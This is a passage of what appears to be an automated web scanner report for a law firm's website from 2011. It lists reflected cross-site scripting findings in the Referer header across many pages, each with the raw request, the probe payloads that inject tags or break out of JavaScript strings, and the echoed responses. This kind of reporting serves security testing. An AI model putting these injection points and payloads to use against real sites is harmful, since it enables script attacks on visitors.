Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /contact.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /events.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events.cfm?id=670&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /experience.cfm?action=case_study HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /global_reach.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Global Reach</title> <meta name="Description" con ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_disclaimer.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_llp_status.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_non_discrimination.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_operating_status.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_privacy_policy.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_statement_clients_rights.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /industries.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... d_capture_file).click(function() { $.post("process_user_capture.cfm", { name: name, company: company, email: email, from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480', document: $(this).attr('id').replace('doc', '') }, function(data) { }, "json"); }); if (requested_capture_forward == '') { setTimeout('$("#doc" + r ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /multimedia.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offices.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /practices.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Practice Areas & Industries</title> <meta nam ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /press_releases.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd
Response
